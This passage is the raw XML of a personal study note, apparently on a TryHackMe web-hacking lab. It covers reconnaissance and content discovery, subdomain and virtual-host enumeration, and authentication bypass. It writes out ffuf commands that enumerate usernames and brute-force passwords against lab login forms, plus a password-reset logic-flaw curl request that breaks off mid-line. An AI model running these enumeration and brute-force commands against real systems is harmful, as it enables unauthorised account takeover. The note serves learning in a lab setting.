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BB1A" w14:textId="7A4EFF6F" w:rsidR="00FA24B1" w:rsidRDefault="00FD0343" w:rsidP="00FD0343">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction to Web Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7600A060" w14:textId="4D454517" w:rsidR="00FD0343" w:rsidRDefault="00F2268A" w:rsidP="00FD0343">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Content Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248DE4FF" w14:textId="77777777" w:rsidR="00F2268A" w:rsidRDefault="00F2268A" w:rsidP="00F2268A"/>
    <w:p w14:paraId="1C86AA85" w14:textId="0E62CCE3" w:rsidR="00F2268A" w:rsidRDefault="00F2268A" w:rsidP="00F2268A">
      <w:r>
        <w:t>Robots.txt – restricts what search engine crawlers can look at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510E9835" w14:textId="3A04F826" w:rsidR="00F2268A" w:rsidRDefault="00F2268A" w:rsidP="00F2268A">
      <w:r>
        <w:t xml:space="preserve">Favicon – </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00C90B22">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://wiki.owasp.org/index.php/OWASP_favicon_database</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="611089C5" w14:textId="77777777" w:rsidR="00F2268A" w:rsidRDefault="00F2268A" w:rsidP="00F2268A"/>
    <w:p w14:paraId="69A3CE72" w14:textId="12F4857B" w:rsidR="00F2268A" w:rsidRDefault="00F2268A" w:rsidP="00F2268A">
      <w:r>
        <w:t xml:space="preserve">Curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00C90B22">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://website.org/favicon/images/favicon.ico</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> | md5sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AD284D" w14:textId="7BCD2BD8" w:rsidR="00F2268A" w:rsidRDefault="00F2268A" w:rsidP="00F2268A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>după</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>verific</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
        <w:t>ă</w:t>
      </w:r>
      <w:r>
        <w:t>m md5 pe site-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framework e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>utilizat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="754F4520" w14:textId="77777777" w:rsidR="00F2268A" w:rsidRDefault="00F2268A" w:rsidP="00F2268A"/>
    <w:p w14:paraId="7434C2A6" w14:textId="0050183B" w:rsidR="00F2268A" w:rsidRDefault="00F2268A" w:rsidP="00781771">
      <w:r>
        <w:t>Sitemap.xml</w:t>
      </w:r>
      <w:r w:rsidR="00781771">
        <w:t xml:space="preserve"> – gives a list of every file the website owners </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00781771">
        <w:t>wishes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00781771">
        <w:t xml:space="preserve"> to be listed on a search engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A98B328" w14:textId="77777777" w:rsidR="00781771" w:rsidRDefault="00781771" w:rsidP="00781771"/>
    <w:p w14:paraId="39E39C1B" w14:textId="0FCB385E" w:rsidR="00781771" w:rsidRDefault="00781771" w:rsidP="00781771">
      <w:r>
        <w:t>HTTP Headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27266B92" w14:textId="015F312C" w:rsidR="00781771" w:rsidRDefault="00781771" w:rsidP="00781771">
      <w:r>
        <w:t>Useful information as webserver software and possibly the programming/ scripting language in use (Server: nginx/ 1.18.0; X-Powered-By: PHP/7.4.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39862906" w14:textId="77777777" w:rsidR="00781771" w:rsidRDefault="00781771" w:rsidP="00781771"/>
    <w:p w14:paraId="43AF4A73" w14:textId="602BFE15" w:rsidR="00781771" w:rsidRDefault="00781771" w:rsidP="00781771">
      <w:r>
        <w:t xml:space="preserve">Curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00C90B22">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://website.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E3AFB5" w14:textId="77777777" w:rsidR="00781771" w:rsidRDefault="00781771" w:rsidP="00781771"/>
    <w:p w14:paraId="5FDE0B6D" w14:textId="02DD027F" w:rsidR="00781771" w:rsidRDefault="00155535" w:rsidP="00781771">
      <w:r>
        <w:t xml:space="preserve">OSINT&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wappalyzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="10F2964B" w14:textId="4076E55F" w:rsidR="00155535" w:rsidRDefault="00155535" w:rsidP="00781771">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00C90B22">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.wappalyzer.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> - identify what technologies a website uses (framework, CMS, payment processors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3683B1AE" w14:textId="77777777" w:rsidR="00155535" w:rsidRDefault="00155535" w:rsidP="00781771"/>
    <w:p w14:paraId="56820A3D" w14:textId="621FD074" w:rsidR="00155535" w:rsidRDefault="00155535" w:rsidP="00781771">
      <w:r>
        <w:t xml:space="preserve">OSINT&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WayBack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB6089C" w14:textId="7FEF3BAD" w:rsidR="00155535" w:rsidRDefault="00155535" w:rsidP="00781771">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00C90B22">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://archive.org/web/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6BA51287" w14:textId="77777777" w:rsidR="00155535" w:rsidRDefault="00155535" w:rsidP="00781771"/>
    <w:p w14:paraId="3108B24C" w14:textId="54F8CBDE" w:rsidR="00155535" w:rsidRDefault="00155535" w:rsidP="00781771">
      <w:r>
        <w:t>OSINT&gt; S3 Buckets (Amazon AWS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F995256" w14:textId="77777777" w:rsidR="00155535" w:rsidRDefault="00155535" w:rsidP="00781771"/>
    <w:p w14:paraId="30DACFEF" w14:textId="7A1C8D94" w:rsidR="00155535" w:rsidRDefault="00155535" w:rsidP="00781771">
      <w:r>
        <w:t xml:space="preserve">Wordlists&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00C90B22">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/danielmiessler/SecList</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="242EE0DF" w14:textId="77777777" w:rsidR="00155535" w:rsidRDefault="00155535" w:rsidP="00781771"/>
    <w:p w14:paraId="45C948B2" w14:textId="17358D34" w:rsidR="00155535" w:rsidRDefault="00155535" w:rsidP="00155535">
      <w:r>
        <w:t>Tools for automated content discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E3DD21" w14:textId="77777777" w:rsidR="00155535" w:rsidRDefault="00155535" w:rsidP="00155535"/>
    <w:p w14:paraId="1F5DC92D" w14:textId="5E5BA49E" w:rsidR="00155535" w:rsidRDefault="00155535" w:rsidP="00155535">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -w /path/to/wordlist -u site/FUZZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D0DDC8" w14:textId="44C5DCD1" w:rsidR="00155535" w:rsidRDefault="00155535" w:rsidP="00155535">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> site wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D52636A" w14:textId="09A53C48" w:rsidR="00155535" w:rsidRDefault="00155535" w:rsidP="00155535">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gobuster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–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> site -w wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECF0E88" w14:textId="77777777" w:rsidR="00970E22" w:rsidRDefault="00970E22" w:rsidP="00155535"/>
    <w:p w14:paraId="317E6E55" w14:textId="77777777" w:rsidR="007844D1" w:rsidRDefault="007844D1" w:rsidP="00155535"/>
    <w:p w14:paraId="01EAE648" w14:textId="77777777" w:rsidR="007844D1" w:rsidRDefault="007844D1" w:rsidP="00155535"/>
    <w:p w14:paraId="0B52831E" w14:textId="77777777" w:rsidR="007844D1" w:rsidRDefault="007844D1" w:rsidP="00155535"/>
    <w:p w14:paraId="0B0F44FD" w14:textId="77777777" w:rsidR="007844D1" w:rsidRDefault="007844D1" w:rsidP="00155535"/>
    <w:p w14:paraId="2F78DA96" w14:textId="77777777" w:rsidR="007844D1" w:rsidRDefault="007844D1" w:rsidP="00155535"/>
    <w:p w14:paraId="59D4C135" w14:textId="34E3F371" w:rsidR="007844D1" w:rsidRDefault="007844D1" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Subdomain Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E92F530" w14:textId="77777777" w:rsidR="007844D1" w:rsidRPr="007844D1" w:rsidRDefault="007844D1" w:rsidP="007844D1"/>
    <w:p w14:paraId="26F7B6DC" w14:textId="4A6683A2" w:rsidR="00970E22" w:rsidRDefault="00970E22" w:rsidP="00155535">
      <w:r>
        <w:t>OSINT SSL/TLS Certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398D35B1" w14:textId="12AEEEFF" w:rsidR="00970E22" w:rsidRDefault="00970E22" w:rsidP="00155535">
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00452C62">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://crt.sh</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0AFAA2D7" w14:textId="77777777" w:rsidR="00970E22" w:rsidRDefault="00970E22" w:rsidP="00155535"/>
    <w:p w14:paraId="0B3BC391" w14:textId="6CAB9EC4" w:rsidR="00970E22" w:rsidRDefault="00970E22" w:rsidP="00155535">
      <w:r>
        <w:t>OSINT Search Engines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272BF024" w14:textId="71BE1AF3" w:rsidR="00970E22" w:rsidRDefault="00970E22" w:rsidP="00155535">
      <w:r>
        <w:t xml:space="preserve">See subdomains for a domain&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>site:*.domain.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -site:www.domain.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604E8054" w14:textId="4FEFE151" w:rsidR="00970E22" w:rsidRDefault="00970E22" w:rsidP="00970E22">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>DNS brute-force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FC0888" w14:textId="73F2A53D" w:rsidR="00970E22" w:rsidRDefault="00970E22" w:rsidP="00970E22">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dnsrecon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -d </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acmeitsupport.thm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0311CB20" w14:textId="02B3CA7D" w:rsidR="00970E22" w:rsidRDefault="00970E22" w:rsidP="00970E22">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dsnrecon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/namelist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C8C8A7" w14:textId="77777777" w:rsidR="00970E22" w:rsidRDefault="00970E22" w:rsidP="00970E22">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33FC8E90" w14:textId="14E4F533" w:rsidR="00970E22" w:rsidRDefault="00970E22" w:rsidP="00970E22">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>OSINT sublist3r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35006C30" w14:textId="6303E87D" w:rsidR="00970E22" w:rsidRDefault="00970E22" w:rsidP="00970E22">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">sublist3r.py -d </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acmeitsupport.thm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5EC46963" w14:textId="77777777" w:rsidR="00970E22" w:rsidRDefault="00970E22" w:rsidP="00970E22">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="505A3B3B" w14:textId="4F52A8DD" w:rsidR="00970E22" w:rsidRDefault="00970E22" w:rsidP="00970E22">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Virtual Hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C7C5B3" w14:textId="64FAADF2" w:rsidR="00970E22" w:rsidRDefault="005F10F6" w:rsidP="00970E22">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/hosts or c:\windows\system32\drivers\etc\hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3904604C" w14:textId="77777777" w:rsidR="005F10F6" w:rsidRDefault="005F10F6" w:rsidP="00970E22">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28DCB263" w14:textId="0E24F1A9" w:rsidR="005F10F6" w:rsidRDefault="005F10F6" w:rsidP="00970E22">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fuff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SecList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/Discovery/DNS/namelist.txt -H “Host: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FUZZ.acmeitsupport.thm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00452C62">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.51.251</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10A54C51" w14:textId="77777777" w:rsidR="005F10F6" w:rsidRDefault="005F10F6" w:rsidP="00970E22">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08926B41" w14:textId="42A8C9F4" w:rsidR="005F10F6" w:rsidRDefault="005F10F6" w:rsidP="005F10F6">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fuff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SecList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/Discovery/DNS/namelist.txt -H “Host: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FUZZ.acmeitsupport.thm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00452C62">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.51.251</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -s {size}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC6B0EC" w14:textId="77777777" w:rsidR="005F10F6" w:rsidRDefault="005F10F6" w:rsidP="00970E22">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A60E236" w14:textId="05A20180" w:rsidR="007844D1" w:rsidRDefault="007844D1" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Authentication Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CA64BC" w14:textId="6A5B2E13" w:rsidR="00644FF9" w:rsidRDefault="00644FF9" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>FIND VALID USERNAMES FROM ERROR MESSAGES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4168B8C8" w14:textId="204CF7C8" w:rsidR="007844D1" w:rsidRDefault="007844D1" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SecLists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/Usernames/Names/names.txt -X POST -d “username=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FUZZ&amp;email</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>x&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>x&amp;</w:t>
      </w:r>
      <w:r w:rsidR="009F542B">
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=x” -H “Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00D832E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.131.149/customers/signup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “username already exists”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484D8373" w14:textId="77777777" w:rsidR="00644FF9" w:rsidRDefault="00644FF9" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="454393B4" w14:textId="5022E007" w:rsidR="00644FF9" w:rsidRDefault="00644FF9" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>nano valid_usernames.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6B9EF8" w14:textId="77777777" w:rsidR="007844D1" w:rsidRDefault="007844D1" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47BB8B8E" w14:textId="690DE1FC" w:rsidR="007844D1" w:rsidRDefault="007844D1" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00D832E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/ffuf/ffuf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13024B95" w14:textId="77777777" w:rsidR="007844D1" w:rsidRDefault="007844D1" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A31E30B" w14:textId="1E05AD74" w:rsidR="00644FF9" w:rsidRDefault="00644FF9" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>BRUTE-FORCE PASSWORD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CACC3B9" w14:textId="03F19A47" w:rsidR="007844D1" w:rsidRDefault="007844D1" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00644FF9">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00644FF9">
        <w:t xml:space="preserve"> -w </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00644FF9">
        <w:t>valid_usernames.txt:W</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00644FF9">
        <w:t>1,usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d “username=W1&amp;password=W2” -H “Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00644FF9">
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00644FF9">
        <w:t xml:space="preserve">” -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00644FF9" w:rsidRPr="00D832E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.131.149/customers/login -fc 200</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="517C2027" w14:textId="77777777" w:rsidR="00644FF9" w:rsidRDefault="00644FF9" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47D402BF" w14:textId="6E4D9EC3" w:rsidR="00644FF9" w:rsidRDefault="00C44504" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>LOGIC FLAW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04420B0F" w14:textId="77777777" w:rsidR="00C44504" w:rsidRDefault="00C44504" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78EDE6F6" w14:textId="460FE770" w:rsidR="00C44504" w:rsidRDefault="00C44504" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00D832E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.131.149/customers/reset</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="682C3B54" w14:textId="74F4012C" w:rsidR="00C44504" w:rsidRDefault="00C44504" w:rsidP="007844D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>curl ‘http://10.10.131.149/customers/reset?email=Robert%40acmeitsupport.thm’ -H ‘Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ -d ‘username=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
